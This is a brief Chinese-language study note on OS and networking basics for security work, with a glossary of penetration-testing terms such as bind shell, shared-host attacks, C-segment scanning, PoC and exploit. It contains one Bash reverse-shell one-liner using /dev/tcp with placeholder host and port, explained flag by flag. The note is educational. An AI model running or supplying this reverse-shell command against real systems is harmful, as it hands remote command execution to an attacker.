操作系统和网络相关

进程和端口的关系

• 一个进程可以绑定多个端口号。
• 一个端口号只能被一个进程绑定。

linux常用文件符

• 0： 标准输入
• 1：标准输出
• 2：标准错误

/bin/bash相关

• /dev/tcp是Bash的特性，其它类型的sh不支持

bash -i >& /dev/tcp/{SERVER_IP}/{SERVER_PORT} 0>&1

-i : 交互模式
`>&`: 重定向标准输出和标志错误到指定目标
0>&1: 0表示标准输入
>&1: 将标准输入重定向标准输出，从TCP读取的输入会送到Bash，shell

名词解释

• WAN口： 连接广域网(Wide Area Network)的端口。

• Bind Shell: 攻击者在目标机器上开启一个服务(nc或者telnet)，并绑定某个端口。当攻击者连接到这个端口时，目标机器会给出一个命令行shell，允许攻击者在目标机器上执行命令。

• 旁站攻击：网络安全中一种利用共享主机资源的漏洞进行攻击的方式。它主要发生在多个网站或者应用程序托管在同一个服务器或同一个IP地址的情况下。

当多个网站共享一个物理服务器(虚拟主机、云服务器或共享服务器环境中)，通常会使用相同的IP地址或资源。旁站攻击者通常发现和利用某个不安全的网站，攻击服务器。

• C段查询： 网络安全和渗透测试中的一种技术，主要用于发现和分析特定IP地址内的活跃设备、网络服务。涉及扫描和探测与目标IP地址相邻的设备或网站。

• Whois查询： 查询互联网域名或IP地址的注册信息的服务。注册信息包含：注册人姓名、联系方式、注册机构、注册日期、域名到期时间。

• poc： Proof of Concep概念验证，通常指的是一种用来证明某个漏洞存在的技术展示或代码片段。

• Exploit： 指的是利用软件或系统中的漏洞、弱点或安全缺陷进行攻击的一种方法、脚本或程序

• A记录（Address Record）是DNS（域名系统）中的一种记录类型，用于将域名解析为IPv4地址